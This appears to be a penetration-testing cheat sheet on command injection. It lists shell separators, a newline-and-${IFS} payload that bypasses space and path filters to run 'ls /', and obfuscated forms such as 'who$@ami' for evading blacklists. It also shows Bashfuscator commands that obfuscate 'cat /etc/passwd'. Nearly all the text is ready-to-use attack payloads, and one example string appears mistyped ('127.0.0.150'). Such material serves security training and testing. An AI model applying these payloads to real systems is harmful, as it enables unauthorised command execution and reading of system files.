# Command Injection

## Basic Command Injection 

```python
;      # semi colon
\n     # New Line %0a
&      # background
|      # pipe
&&     # AND
||     # OR
``     # Sub Shell (backticks)
$()    # Sub-Shell
```

## Advanced Command Injection

### When Space,and paths(/etc/passwd, /, /home ) are not Allowed

```python
# %0a is new line
# ls will list the file
# ${IFS} when space is blacklisted
# ${PATH:0:1} it will grab / from path variables

ip=127.0.0.150%0als${IFS}${PATH:0:1} 

# Final Command Becomes

127.0.0.1
ls /

```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FVxnp87h7g6BJx2rl4RpZ%2Fimage.png?alt=media&#x26;token=6d79b3a9-909a-4fb6-bd6c-8a95bec3f96c" alt=""><figcaption></figcaption></figure>

## Bypassing Blacklists(whoami,pwd,ls,cat)

```python
who$@ami
w`h`o`a`mi  # should be even
```

## Automated Obfuscation Tool for Command Injection

### BashFuscator

{% embed url="<https://github.com/Bashfuscator/Bashfuscator>" %}

we can use this tool to obfuscate our command

```python
bashfuscator -c "cat /etc/passwd"
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FlOZLAYFwOkq4dqdhgYsU%2Fimage.png?alt=media&#x26;token=ad5a1b4a-94ad-425b-8632-e32b88e8c852" alt=""><figcaption></figcaption></figure>

it will give very huge payload, to make it short we can use below command

```python
bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FJ4RJ1QhPESDkpBXkqdkE%2Fimage.png?alt=media&#x26;token=1c0477b7-a028-490b-95e2-acc39ab873c0" alt=""><figcaption></figcaption></figure>